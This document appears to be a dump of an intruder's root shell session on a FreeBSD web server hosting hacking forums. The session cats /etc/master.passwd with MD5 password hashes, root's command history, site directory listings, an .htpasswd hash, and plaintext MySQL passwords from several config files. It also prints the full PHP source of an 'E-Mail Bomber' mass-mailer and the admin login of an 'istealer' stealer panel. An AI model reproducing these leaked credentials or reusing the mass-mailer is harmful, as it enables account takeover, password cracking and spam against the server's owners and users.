_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin
secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin
testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin
224422:*:1004:1004:User &:/home/224422:/sbin/nologin
testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin
union:*:1006:1006:User &:/home/union:/sbin/nologin
hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin

# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin
secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin
testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin
224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin
testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin
union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin
hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin

# pwd
/root

# ls -la
total 6292
drwxr-xr-x   4 root  wheel      512 Sep 29 09:07 .
drwxr-xr-x  18 root  wheel      512 Jul  1 01:53 ..
-rw-------   1 root  wheel    10971 Oct  4 14:44 .bash_history
-rw-r--r--   1 root  wheel      798 Jan 18  2010 .cshrc
-rw-------   1 root  wheel     5249 Sep 30 21:55 .history
-rw-r--r--   1 root  wheel      155 Jan 18  2010 .k5login
-rw-------   1 root  wheel       71 Jul  5 15:47 .lesshst
-rw-r--r--   1 root  wheel      303 Jan 18  2010 .login
drwx------   3 root  wheel      512 Sep 29 09:07 .mc
-rw-------   1 root  wheel       18 Jul 21 17:26 .mysql_history
-rw-r--r--   1 root  wheel      265 Jan 18  2010 .profile
drwx------   2 root  wheel      512 Mar 10  2010 .ssh
-rw-r--r--   1 root  wheel        0 Jul  5 15:46 ec1902
-rw-r--r--   1 root  wheel      168 Feb  1  2010 example.php
-rw-r--r--   1 root  wheel      476 Sep  2 06:37 forsirius.conf
-rw-r--r--   1 root  wheel  3150763 Feb 21  2011 ioncube_loaders_fre_8_x86-64.tar.gz

# cat .bash_history
make install clean
cd /usr/ports/devel/ZendOptimizer/
make install clean
mc -d
cd /usr/ports/
search name=eaccelerator
make search name=eaccelerator
cd /usr/ports/www/eaccelerator
make install clean
mkdir /tmp/eaccelerator
chown www /tmp/eaccelerator
chmod 0700 /tmp/eaccelerator
mc -d
cd /usr/ports/
make search name=ioncube
cd /usr/ports/devel/ioncube
make install clean
mc -d
cd /usr/ports/lang/php52-extensions/
make install clean
pkg_version -vIL=
php -v
php -m
php -v
php -m
history
php -v
mc
php -v
php -v
mc
php -m
mc
mc
pkg_info|grep ioncube
pkg_info|grep php
mc -d
ifconfig
apachectl start
mc -d
fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz
php loader-wizard.php
rm loader-wizard.php
cd /usr/ports/devel/ioncube/
make clean
make
/usr/local/etc/rc.d/nginx start
mcedit -d /etc/rc.conf
/usr/local/etc/rc.d/nginx start
ifconfig
apachectl restart
ps ax|grep apache
ps ax|grep http
apachectl start
ps ax|grep http
cat /var/log/httpd/httpd_error.log
cat /var/log/httpd/httpd_error.log
apachectl start
ps ax|grep http
apachectl stop
apachectl start
php -v
cd /
php -v
php -v
/usr/local/etc/rc.d/nginx stop
/usr/local/etc/rc.d/apache22 restart
exit
edit /etc/rc.conf
exit
ps ax
cd /home/
ls -l
cd webserver/
ls -l
ls -l
mc
sockstat -l4
vi /etc/rc.conf
jls
mc
apachectl restart
tail -n 100 /var/log/httpd/httpd_access.log
tail -n 100 /var/log/httpd/httpd_error.log
mc
tail -n 100 /var/log/httpd/httpd_error.log
mc
tail -n 100 /var/log/httpd/httpd_error.log
ls -la /home
ls -la /home/webserver/
ls -la /home/webserver/free-hack.in/
ls -la /home/webserver/free-hack.in/msd1/
chmod -R 755 /home/webserver/
exit
mcedit /etc/my.cnf
/usr/local/etc/rc.d/mysql-server restart
exit
mc
/usr/local/etc/rc.d/mysql-server restart
mcedit /usr/local/etc/php.ini
apachectl restart
php -m
php -v
exit
passwd
exit
passwd
tail -f /var/log/httpd/httpd_access.log
top
ps ax | grpe http | wc -l
ps ax | grep http | wc -l
tail -f /var/log/httpd/httpd_access.log
top
mysql -uroot -p`cat /etc/my.passwd `
uname -a
mailq
postsuper -D ALL
postsuper -d ALL
mailq
/usr/local/etc/rc.d/mysql-server restart
mysql -uroot -p`cat /etc/my.passwd `
mc
gstat
ps auxf
ifconfig
ee /usr/local/etc/apache22/httpd.conf
ee /usr/local/etc/nginx/nginx.conf
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/nginx restart
/usr/local/etc/rc.d/nginx stop
ifconfig
ifconfig
head /usr/local/etc/apache22/httpd.conf
ps auxf
ee /usr/local/etc/apache22/httpd.conf
/usr/local/etc/rc.d/apache22 restart
ls -la /home/freakyfreehack/
ee /usr/local/etc/apache22/httpd.conf
/usr/local/etc/rc.d/apache22 restart
ls -la /home/secunet/
tail -f /var/log/httpd/httpd_access.log
/usr/local/etc/rc.d/apache22 restart
mc
/usr/local/etc/rc.d/apache22 restart
ifconfig
mc
ps wauxf
ifconfig
tail -f /var/log/httpd/httpd_access.log  | grep server
killall -9 tail
tail -100 /var/log/httpd/httpd_access.log  | grep server
ps wauxf
tail -1-00 /var/log/httpd/httpd_access.log  | grep server
tail -1000 /var/log/httpd/httpd_access.log  | grep server
ps wauxf
history
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
/usr/local/etc/rc.d/apache22 restart
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
mc
apachectl restart
apachectl stop
apachectl start
top
/usr/local/etc/rc.d/apache22 restart
top
head /usr/local/etc/apache22/httpd.conf
ps wauxf
ps wauxf | gre nginx
ps wauxf | grep nginx
cd /home/
grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/*
cd /home/forsirius/testsite15.w2c.ru
ls -la
grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/*
grep w2c.ru /usr/local/etc/apache22/vhosts/*
cd /home/forsirius/testsite15.w2c.ru
ls -la
ifconfig
cd ..
ls -la
cd ..
ls -la
mc
cd /home/forsirius/testsite.w2c.ru
grep w2c.ru /usr/local/etc/apache22/vhosts/*
ifconfig
cat /etc/rc.conf
cat /etc/rc.conf
ifconfig
cat /etc/rc.conf
cat /etc/rc.local
cat /etc/rc.local
cat /etc/rc.conf
cd /home/224422/
ls -[la
ls -la
cd 224422.w2c.ru/
ls -la
ls -la
cat index.php
cd inn
cd inc
ls -la
cd ..
ls -la
ls -la pwd
ls -la adm
date
ntpdate -v -b in.pool.ntp.org
ntpdate -v -b pool.ntp.org
date 0037
date
date --help
date
mc
ps ax
/usr/local/etc/rc.d/apache22 start
ps ax
ps ax
ps ax
/usr/local/etc/rc.d/apache22 restart
mc
/usr/local/etc/rc.d/apache22 restart
top
/usr/local/etc/rc.d/apache22 restart
top -S
netstat
top -S
tcpdump
exit
/usr/local/etc/rc.d/apache22 restart
exit
ps ax
exit
cat /usr/local/etc/apache22/vhosts/hackerzhub.conf
cat /usr/local/etc/apache22/vhosts/secunet.conf
history | grep php
ee /usr/local/etc/php.ini
tail -100 /var/log/httpd/httpd_access.log
grep hackbase.cc /usr/local/etc/apache22/vhosts/*
cd /home/webserver/hackbase.cc
ls -la
ee info.php
ee /usr/local/etc/php-apache.ini
/usr/local/etc/rc.d/apache22 reload
/usr/local/etc/rc.d/apache22 reload
/usr/local/etc/rc.d/apache22 restart
nslookup
nslookup
exit

# cd /home

# ls -la
total 36
drwxr-x--x   9 root        wheel  512 Oct 14 00:41 .
drwxr-xr-x  18 root        wheel  512 Jul  1 01:53 ..
drwxrwxr-x   4 224422      www    512 Oct  9 20:19 224422
drwxr-x---   5 4004        www    512 Oct  8 18:55 4004
drwxr-x---  10 hbstream    www    512 Oct  9 19:37 hbstream
drwxr-x---   5 secunet     www    512 Jul  6 21:14 secunet
drwxr-x---   3 testserver  www    512 Sep 21 18:11 testserver
drwxr-x---   3 testsite    www    512 Sep  2 06:55 testsite
drwxr-xr-x   6 webserver   www    512 Oct 14 00:37 webserver

# cd 224422

# ls
224422.w2c.ru   temp

# ls -la
total 16
drwxrwxr-x  4 224422  www     512 Sep 18 18:05 .
drwxr-x--x  9 root    wheel   512 Sep 30 10:52 ..
drwxrwx---  4 224422  www     512 Sep 20 18:24 224422.w2c.ru
drwxrwx---  2 224422  www    2048 Sep 20 15:04 temp

# cd 224422.w2c.ru

# ls -la
total 36
drwxrwx---   6 224422  www   512 Oct 18 17:58 .
drwxrwxr-x   4 224422  www   512 Oct  9 20:19 ..
drwxrwxrwx   3 224422  www  1024 Sep 18 17:26 Checker
-rw-r--r--   1 224422  www  1034 Sep 20 18:24 index.html
drwxr-xr-x  11 224422  www   512 Sep 19 17:36 istealer
-rw-r--r--   1 224422  www  2704 Oct 18 17:58 mail.php
drwxrwxrwx   2 224422  www   512 Oct 13 21:46 test
drwxrwxrwx   3 224422  www   512 Oct 13 21:41 test2

# cat mail.php 
<?php
header('Content-Type: text/html; charset=utf-8'); 

// ---------------------------- # Konfiguration # -----------------------------------------------------    
    $db_host = "localhost";     # Der Datenbank-Host
    $db_user = "224422_db";          # Der Datenbank-Benutzer
    $db_password = "johnny69";          # Das Passwort für die Datenbank
    $db_name = "224422_db";		# Der Datenbank-Name
	$db_tabelle = "user";		# Die Tabelle
	$db_spalte = "email";		# Name der Email-Spalte
	
$conn = mysql_connect($db_host,$db_user,$db_password) or die (mysql_error()); 
mysql_select_db($db_name, $conn) or die (mysql_error()); 
$sql = "SELECT ".$db_spalte." FROM `".$db_tabelle."` WHERE 1";

$ergebnis = mysql_query($sql);
?>





<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>E-Mail Bomber</title>
</head>
<body>
<?php
if(isset($_POST['submit'])){
    $bom = $_POST['bom'];
    $anon = $_POST['anon'];
    $von = "From: ".$_POST['von'];
    $emp = $_POST['semp'];
    echo "Emails werden versanden.";
	
	while($row = mysql_fetch_object($ergebnis))
	{
		$mail = mail($row->email, $bom, $anon, $von);
		if($mail == TRUE){
			echo $row->email . " hat EMail erhalten."."<br>";}
		else{
			echo $row->email . " hat keine Email erhalten."."<br>";}
	}
}
?>
<center><pre>######################################
##########-DB-Mass-Mailer--###########
#################-by-#################
##############--bebop--###############
######################################</pre></center><br />
<form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
<table border="0" align="center">
  <tr>
    <td valign="bottom">Email-Liste:</td>
    <td valign="bottom"><div align="right">Betreff:<br>
          <input type="text" name="bom" />
    </div></td>
    <td valign="bottom"><div align="right">von:<br>
          <input type="text" name="von" />
    </div></td>
  </tr>
  <tr>
    <td colspan="3" valign="bottom"><textarea name="emails" cols="90" rows="10"><?php
while($row = mysql_fetch_object($ergebnis))
{
  echo $row->email . "\n";
}
?></textarea><br>Liste lässt sich nicht ändern, musst wenn dann in der DB genert werden.</td>
    </tr>
  <tr>
    <td colspan="3" valign="bottom">Text:<br>
      <textarea name="anon" cols="90" rows="10"></textarea></td>
    </tr>
  <tr>
    <td valign="bottom"><br /></td>
    <td valign="bottom"><div align="center">
      <input type="submit" name="submit" value="mail IT!!" />
    </div></td>
    <td valign="bottom"></td>
  </tr>
</table>
</form>
</body>
</html>

# cat istealer/inc/config.php
<?php
//Connection
$server    = 'localhost';
$username  = '224422_db';
$passwort  = 'johnny69';
$db                = '224422_db';

//Logs per page (15 normal)
$pagecount = 15;

//Login
$username_ = 'manifest';
$password_ = 'manifestismus';

mysql_connect($server,$username,$passwort);
mysql_select_db($db);
?>#

# cd /home

# cd hbstream

# ls -la
total 60
drwxr-xr-x   3 hbstream  www     512 Oct  3 11:17 ### German Top 100 Single Charts ###
drwxr-x---   8 hbstream  www     512 Oct  3 11:17 .
drwxr-x--x   9 root      wheel   512 Sep 30 10:52 ..
drwxr-xr-x   7 hbstream  www    9216 Oct  3 10:57 Dubstep & Drum'n'Bass
drwxr-xr-x   3 hbstream  www    5632 Oct  2 12:19 Hardstyle & Hardcore
drwxr-xr-x  13 hbstream  www     512 Oct  4 19:04 Hip Hop & R'n'B & Rap
drwxr-xr-x   5 hbstream  www     512 Oct  4 19:04 House & Electro
drwxr-xr-x  23 hbstream  www    1024 Oct  4 19:19 Rock & Alternative-Rock & Pop-Rock
-rw-r--r--   1 hbstream  www     566 Sep 30 20:32 www.Hackbase.cc.txt

# cat www.Hackbase.cc.txt
.##.....##....###.....######..##....##.########.....###.....######..########
.##.....##...##.##...##....##.##...##..##.....##...##.##...##....##.##......
.##.....##..##...##..##.......##..##...##.....##..##...##..##.......##......
.#########.##.....##.##.......#####....########..##.....##..######..######..
.##.....##.#########.##.......##..##...##.....##.#########.......##.##......
.##.....##.##.....##.##....##.##...##..##.....##.##.....##.##....##.##......
.##.....##.##.....##..######..##....##.########..##.....##..######..########

Visit us!

www.Hackbase.cc#

# omg^C

# cd /home/secunet/

# ls -la 
total 28
drwxr-x---   5 secunet  www     512 Jul  6 21:14 .
drwxr-x--x   9 root     wheel   512 Sep 30 10:52 ..
drwxrwx---  18 secunet  www    2560 Sep 26 08:29 secunet.to
drwxrwxrwx  17 secunet  www    2560 Sep 18 16:16 secunet.u2m.ru
drwxrwx---   2 secunet  www    1024 Oct  5 02:36 temp

# grep dbname includes/config.php
$config['Database']['dbname'] = 'secunet_db';

# grep username includes/config.php
        //      This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'secunet_db';
$config['SlaveServer']['username'] = '';

# grep password includes/config.php
        //      This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'aAtCcjISa41';
$config['SlaveServer']['password'] = '';

# cd /home/webserver

# ls -la
total 32
drwxr-xr-x   7 webserver  www     512 Sep 30 12:16 .
drwxr-x--x   9 root       wheel   512 Sep 30 10:52 ..
drwxr-xr-x   2 webserver  www     512 Jun 30 15:56 .auth
drw-r-----   2 webserver  www     512 Jun 29 15:53 free-hack.w2c.ru
drwxr-x---  18 webserver  www    3072 Oct  3 19:45 hackbase.cc
drwxrwx---   2 webserver  www     512 Sep  6 10:34 m.hackbase.cc
drwxrwx---   2 webserver  www    1024 Oct  5 10:47 temp

# cd .auth

# ls -la
total 12
drwxr-xr-x  2 webserver  www  512 Jun 30 15:56 .
drwxr-xr-x  7 webserver  www  512 Sep 30 12:16 ..
-r-xr-x---  1 webserver  www   35 Jul  1 02:26 .htpasswd

# cat .htpasswd
:$1$mfjXKRh6$ansxD9hBY1yOwCc1CGQTN.

# cd ..

# cd hackbase.cc

# ls -la
total 5780
drwxr-x---  18 webserver  www    3072 Oct  3 19:45 .
drwxr-xr-x   7 webserver  www     512 Sep 30 12:16 ..
-rw-r--r--   1 webserver  www   23961 Aug 25 04:18 LICENSE
-rw-r--r--   1 webserver  www   44950 Aug 25 04:53 ajax.php
-rw-r--r--   1 webserver  www   76022 Aug 25 04:53 album.php
-rw-r--r--   1 webserver  www   19420 Aug 25 04:53 announcement.php
-rw-r--r--   1 webserver  www    4314 Aug 25 04:53 api.php
-rw-r--r--   1 webserver  www    3907 Aug 25 04:53 apichain.php
drwxr-xr--   2 webserver  www     512 Jul  2 13:44 archive
-rw-r--r--   1 webserver  www    8790 Aug 25 04:53 asset.php
-rw-r--r--   1 webserver  www   20483 Aug 25 04:53 assetmanage.php
-rw-r--r--   1 webserver  www   15876 Aug 25 04:53 attachment.php
-rw-r--r--   1 webserver  www    6735 Aug 25 04:53 attachment_inlinemod.php
-rw-r--r--   1 webserver  www  126555 Aug 25 04:53 blog.php
-rw-r--r--   1 webserver  www   19133 Aug 25 04:53 blog_ajax.php
-rw-r--r--   1 webserver  www    3702 Aug 25 04:53 blog_attachment.php
-rw-r--r--   1 webserver  www    3922 Aug 25 04:53 blog_callback.php
-rw-r--r--   1 webserver  www   13210 Aug 25 04:53 blog_external.php
-rw-r--r--   1 webserver  www   60275 Aug 25 04:53 blog_inlinemod.php
-rw-r--r--   1 webserver  www   80604 Aug 25 04:53 blog_post.php
-rw-r--r--   1 webserver  www    8631 Aug 25 04:53 blog_report.php
-rw-r--r--   1 webserver  www   31799 Aug 25 04:53 blog_subscription.php
-rw-r--r--   1 webserver  www    5889 Aug 25 04:53 blog_tag.php
-rw-r--r--   1 webserver  www  109552 Aug 25 04:53 blog_usercp.php
-rw-r--r--   1 webserver  www   96793 Aug 25 04:53 calendar.php
-rw-r--r--   1 webserver  www  193581 Aug 25 04:18 checksums.md5
-rw-r--r--   1 webserver  www    3381 Aug 25 04:53 ckeditor.php
-rw-r--r--   1 webserver  www      43 Aug 25 04:18 clear.gif
drwxr-xr--  11 webserver  www    4096 Aug 13 00:56 clientscript
-rw-r--r--   1 webserver  www    1714 Aug 25 04:53 content.php
-rw-r--r--   1 webserver  www   15427 Aug 25 04:53 converse.php
drwxr-xr--   7 webserver  www     512 Jul  2 03:13 cpstyles
-rw-r--r--   1 webserver  www    3308 Aug 25 04:53 cron.php
-rw-r--r--   1 webserver  www    6251 Aug 25 04:53 css.php
drwxr-xr--   3 webserver  www     512 Jul  2 03:13 customavatars
drwxr-xr--   3 webserver  www     512 Aug 13 00:18 customgroupicons
drwxr-xr--   2 webserver  www     512 Jul  2 03:13 customprofilepics
drwxr-xr--   4 webserver  www     512 Jul  9 21:40 dbtech
drwxr-xr--   3 webserver  www     512 Jul  8 20:55 digitalvb
-rw-r--r--   1 webserver  www    1784 Aug 25 04:53 editor.php
-rw-r--r--   1 webserver  www   47307 Aug 25 04:53 editpost.php
-rw-r--r--   1 webserver  www    1400 Aug 25 04:53 entry.php
-rw-r--r--   1 webserver  www   30358 Aug 25 04:53 external.php
-rw-r--r--   1 webserver  www    9965 Aug 25 04:53 faq.php
-rw-r--r--   1 webserver  www   10134 Aug 25 04:18 favicon.ico
-rw-r--r--   1 webserver  www     524 Aug 25 04:18 file_id.diz
-rw-r--r--   1 webserver  www   22525 Aug 25 04:53 forum.php
-rw-r--r--   1 webserver  www   43184 Aug 25 04:53 forumdisplay.php
-rw-r--r--   1 webserver  www    2070 Aug 25 04:53 global.php
-rw-r--r--   1 webserver  www  152671 Aug 25 04:53 group.php
-rw-r--r--   1 webserver  www   26226 Aug 25 04:53 group_inlinemod.php
-rw-r--r--   1 webserver  www   11407 Aug 25 04:53 groupsubscription.php
drwxr-xr--   3 webserver  www    2560 Aug 22 22:59 hbisonfire
-rw-r--r--   1 webserver  www    9061 Aug 25 04:53 image.php
drwxr-xr--  28 webserver  www    1024 Aug  6 23:56 images
drwxr-xr--   9 webserver  www    7168 Aug 18 12:26 includes
-rw-r--r--   1 webserver  www    2396 Aug 25 04:53 index.php
-rw-r--r--   1 root       www     169 Oct  3 19:45 info.php
-rw-r--r--   1 webserver  www   47302 Aug 25 04:53 infraction.php
-rw-r--r--   1 webserver  www  187364 Aug 25 04:53 inlinemod.php
-rw-r--r--   1 webserver  www   11742 Aug 25 04:53 joinrequests.php
-rw-r--r--   1 webserver  www    1720 Aug 25 04:53 list.php
-rw-r--r--   1 webserver  www   11100 Aug 25 04:53 login.php
-rw-r--r--   1 webserver  www   30891 Aug 25 04:53 member.php
-rw-r--r--   1 webserver  www   16391 Aug 25 04:53 member_inlinemod.php
-rw-r--r--   1 webserver  www   40134 Aug 25 04:53 memberlist.php
-rw-r--r--   1 webserver  www   22263 Aug 25 04:53 misc.php
-rw-r--r--   1 webserver  www    3957 Aug 25 04:53 mobile.php
-rw-r--r--   1 webserver  www   76389 Aug 25 04:53 moderation.php
-rw-r--r--   1 webserver  www    6778 Aug 25 04:53 moderator.php
-rw-r--r--   1 webserver  www   17561 Aug 25 04:53 newattachment.php
-rw-r--r--   1 webserver  www   41469 Aug 25 04:53 newreply.php
-rw-r--r--   1 webserver  www   20667 Aug 25 04:53 newthread.php
-rw-r--r--   1 webserver  www   21607 Aug 25 04:53 online.php
drwxr-xr--   8 webserver  www     512 Jul  2 03:20 packages
-rw-r--r--   1 webserver  www    8571 Aug 25 04:53 payment_gateway.php
-rw-r--r--   1 webserver  www   13359 Aug 25 04:53 payments.php
-rw-r--r--   1 webserver  www    4061 Aug 25 04:53 picture.php
-rw-r--r--   1 webserver  www   16664 Aug 25 04:53 picture_inlinemod.php
-rw-r--r--   1 webserver  www   26595 Aug 25 04:53 picturecomment.php
-rw-r--r--   1 webserver  www   29356 Aug 25 04:53 poll.php
-rw-r--r--   1 webserver  www   17737 Aug 25 05:39 post_thanks.php
-rw-r--r--   1 webserver  www   10363 Aug 25 04:53 posthistory.php
-rw-r--r--   1 webserver  www   76560 Aug 25 04:53 postings.php
-rw-r--r--   1 webserver  www    7082 Aug 25 04:53 printthread.php
-rw-r--r--   1 webserver  www   81402 Aug 25 04:53 private.php
-rw-r--r--   1 webserver  www  163833 Aug 25 04:53 profile.php
-rw-r--r--   1 webserver  www    1053 Aug 18 00:44 rbs_wrapper.swf
-rw-r--r--   1 webserver  www   56507 Aug 25 04:53 register.php
-rw-r--r--   1 webserver  www    7293 Aug 25 04:53 report.php
-rw-r--r--   1 webserver  www   14764 Aug 25 04:53 reputation.php
-rw-r--r--   1 webserver  www   35136 Aug 25 04:53 search.php
-rw-r--r--   1 webserver  www   22917 Aug 25 04:53 sendmessage.php
-rw-r--r--   1 webserver  www   12924 Aug 25 04:53 showgroups.php
-rw-r--r--   1 webserver  www   12851 Aug 25 04:53 showpost.php
-rw-r--r--   1 webserver  www   82235 Aug 25 04:53 showthread.php
drwxr-xr--   2 webserver  www     512 Jul  2 03:22 signaturepics
drwxr-xr--   2 webserver  www     512 Jul  6 16:07 specialmodlogin
drwxr-xr--   2 webserver  www     512 Jul  2 03:22 store_sitemap
-rw-r--r--   1 webserver  www   39286 Aug 25 04:53 subscription.php
-rw-r--r--   1 webserver  www    5398 Aug 25 04:53 tags.php
-rw-r--r--   1 webserver  www    5582 Jul  9 22:23 thanks.php
-rw-r--r--   1 webserver  www    8799 Aug 25 04:53 threadrate.php
-rw-r--r--   1 webserver  www   11149 Aug 25 04:53 threadtag.php
-rw-r--r--   1 webserver  www      61 Aug 25 04:19 uploadprogress.gif
-rw-r--r--   1 webserver  www   39716 Aug 25 04:53 usercp.php
-rw-r--r--   1 webserver  www   21748 Aug 25 04:53 usernote.php
drwxr-xr--  13 webserver  www    1024 Jul  2 03:22 vb
-rw-r--r--   1 webserver  www    6907 Jul  9 23:24 vbshout.php
-rw-r--r--   1 webserver  www   28550 Aug 25 04:53 visitormessage.php
-rw-r--r--   1 webserver  www    1724 Aug 25 04:53 widget.php
-rw-r--r--   1 webserver  www    3846 Aug 25 04:53 xmlsitemap.php

# grep dbname includes/config.php
$config['Database']['dbname'] = 'webserver_base';

# grep username includes/config.php
        //      This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'webserver_base';
$config['SlaveServer']['username'] = '';

# grep password includes/config.php
        //      This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'k4Q5{k+Xz-94W,a{';
$config['SlaveServer']['password'] = '';

# cd hbisonfire

# ls -la
total 4508
drwxr-xr--   3 webserver  www    2560 Aug 22 22:59 .
drwxr-x---  18 webserver  www    3072 Oct  3 19:45 ..
-rw-r--r--   1 webserver  www     165 Aug 25 04:19 .htaccess
-rw-r--r--   1 webserver  www      44 Aug 25 04:19 .htpasswd
-rw-r--r--   1 webserver  www   19367 Aug 25 04:53 accessmask.php
-rw-r--r--   1 webserver  www   35727 Aug 25 04:53 ad.php
-rw-r--r--   1 webserver  www   15526 Aug 18 00:42 admin_rbs.php
-rw-r--r--   1 webserver  www    3354 Aug 18 00:42 admin_rbs_banner_list.php
-rw-r--r--   1 webserver  www    2289 Aug 18 00:42 admin_rbs_delete.php
-rw-r--r--   1 webserver  www    2366 Aug 18 00:42 admin_rbs_disable.php
-rw-r--r--   1 webserver  www   39681 Aug 25 04:53 admincalendar.php
-rw-r--r--   1 webserver  www   50113 Aug 25 04:53 admininfraction.php
-rw-r--r--   1 webserver  www   19166 Aug 25 04:53 adminlog.php
-rw-r--r--   1 webserver  www    8333 Aug 25 04:53 adminpermissions.php
-rw-r--r--   1 webserver  www   25946 Aug 25 04:53 adminreputation.php
-rw-r--r--   1 webserver  www   13116 Aug 25 04:53 announcement.php
-rw-r--r--   1 webserver  www    3532 Aug 25 04:53 api.php
-rw-r--r--   1 webserver  www   18912 Aug 25 04:53 apilog.php
-rw-r--r--   1 webserver  www   14594 Aug 25 04:53 apistats.php
-rw-r--r--   1 webserver  www   56243 Aug 25 04:53 attachment.php
-rw-r--r--   1 webserver  www   12528 Aug 25 04:53 attachmentpermission.php
-rw-r--r--   1 webserver  www   19346 Aug 25 04:53 avatar.php
-rw-r--r--   1 webserver  www   18089 Aug 25 04:53 bbcode.php
-rw-r--r--   1 webserver  www   12151 Aug 25 04:53 block.php
-rw-r--r--   1 webserver  www  100187 Aug 25 04:53 blog_admin.php
-rw-r--r--   1 webserver  www   15227 Aug 25 04:53 bookmarksite.php
-rw-r--r--   1 webserver  www   12099 Aug 25 04:53 calendarpermission.php
-rw-r--r--   1 webserver  www      43 Aug 25 04:19 clear.gif
-rw-r--r--   1 webserver  www   60992 Aug 25 04:53 cms_admin.php
-rw-r--r--   1 webserver  www   15459 Aug 25 04:53 cms_content_admin.php
-rw-r--r--   1 webserver  www   24341 Aug 25 04:53 cms_permissions.php
drwxr-xr--   2 webserver  www     512 Jul  2 03:09 control_examples
-rw-r--r--   1 webserver  www   24040 Aug 25 04:53 cronadmin.php
-rw-r--r--   1 webserver  www   10750 Aug 25 04:53 cronlog.php
-rw-r--r--   1 webserver  www   34189 Aug 25 04:53 css.php
-rw-r--r--   1 webserver  www   22980 Aug 25 04:53 diagnostic.php
-rw-r--r--   1 webserver  www   11739 Aug 25 04:53 email.php
-rw-r--r--   1 webserver  www   24532 Aug 25 04:53 faq.php
-rw-r--r--   1 webserver  www   12192 Aug 20 18:40 force_read_thread.php
-rw-r--r--   1 webserver  www   31484 Aug 25 04:53 forum.php
-rw-r--r--   1 webserver  www   30079 Aug 25 04:53 forumpermission.php
-rw-r--r--   1 webserver  www    7599 Aug 25 04:53 global.php
-rw-r--r--   1 webserver  www   23687 Aug 25 04:53 help.php
-rw-r--r--   1 webserver  www   51910 Aug 25 04:53 image.php
-rw-r--r--   1 webserver  www    8046 Aug  7 21:03 inactivitylog.php
